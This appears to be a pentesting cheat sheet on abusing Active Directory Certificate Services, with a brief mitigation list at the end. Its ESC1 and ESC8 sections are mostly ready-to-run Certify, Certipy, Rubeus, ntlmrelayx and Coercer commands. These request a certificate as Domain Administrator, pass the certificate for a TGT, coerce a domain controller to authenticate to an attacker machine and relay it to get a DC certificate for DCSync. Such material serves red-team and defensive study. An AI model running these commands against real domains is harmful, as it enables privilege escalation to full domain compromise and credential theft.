AD CS Abuse

Exploitation
A06

Active Directory Certificate Services (AD CS) is Microsoft's PKI implementation. Misconfigurations in certificate templates and enrollment services can allow attackers to escalate privileges from a standard user to Domain Admin, often with persistence.

Tools of the Trade

Certify

C# tool to enumerate and abuse AD CS (The "BloodHound" of AD CS).

Coercer

Python tool to coerce authentication (useful for ESC8).

Certipy

Python equivalent of Certify/Rubeus for Linux/Impacket users.

PKINITtools

Tools for interacting with Kerberos PKINIT (gettgtpkinit.py).

ESC1: Misconfigured Certificate Templates

ESC1 occurs when a certificate template allows low-privileged users to enroll and specify a SubjectAltName (SAN). This allows an attacker to request a certificate as any user (e.g., Administrator), which can then be used to request a TGT.

1. Enumeration

Find vulnerable templates. Look for EnrolleeSuppliesSubject: True and Client Authentication EKU.

Certify (Windows):

powershell 
.\Certify.exe find /vulnerable

Certipy (Linux):

bash 
certipy find -u user@corp.local -p password -dc-ip 10.10.10.1 -vulnerable

2. Exploitation

Request a certificate for the Domain Administrator.

Certify:

powershell 
.\Certify.exe request /ca:DC01.corp.local\corp-DC01-CA /template:VulnerableTemplate /altname:Administrator

Certipy:

bash 
certipy req -u user@corp.local -p password -ca corp-DC01-CA -target DC01.corp.local -template VulnerableTemplate -upn Administrator@corp.local

3. Authenticate (Pass-the-Certificate)

Convert the certificate (.pfx) to a TGT and NTLM hash.

Rubeus:

powershell 
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:cert_password /ptt

Certipy:

bash 
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

ESC8: NTLM Relay to AD CS HTTP Endpoints

If the AD CS server has the "Certificate Authority Web Enrollment" role installed, it exposes an HTTP endpoint. This endpoint does not support NTLM Relay protection (Signing/MIC). Attackers can coerce a Domain Controller to authenticate to them (via PetitPotam/Coercer) and relay that authentication to the AD CS HTTP endpoint to request a certificate for the DC.

1. Identify Web Enrollment

Check for HTTP endpoints on CAs.

bash 
certipy find -u user@corp.local -p password -dc-ip 10.10.10.1 -vulnerable

Look for "Web Enrollment" in the output.

2. Setup Relay

Configure ntlmrelayx to target the CA's HTTP endpoint and use the "DomainController" template (or "Machine").

bash 
impacket-ntlmrelayx -t http://10.10.10.5/certsrv/certfnsh.asp -smb2support --template DomainController --adcs

3. Coerce Authentication

Force the Domain Controller (10.10.10.1) to authenticate to your attacker machine (10.10.10.99).

bash 
python3 Coercer.py -t 10.10.10.1 -l 10.10.10.99

If successful, ntlmrelayx will output a base64 certificate for the Domain Controller machine account. You can use this to DCSync.

Defense & Mitigation

  • Disable Unused Templates: Remove templates that are not strictly needed.
  • Restrict Enrollment: Ensure "Manager Approval" is required for sensitive templates.
  • Remove "Enrollee Supplies Subject": Do not allow users to specify SANs in templates.
  • Disable HTTP Web Enrollment: If not needed, remove the role. If needed, enable Extended Protection for Authentication (EPA) and require SSL.
  • Monitor: Watch for Event ID 4886 (Certificate Request) and 4887 (Certificate Issued) for sensitive accounts.

Related Topics

Kerberos Attacks

NTLM Relay

BloodHound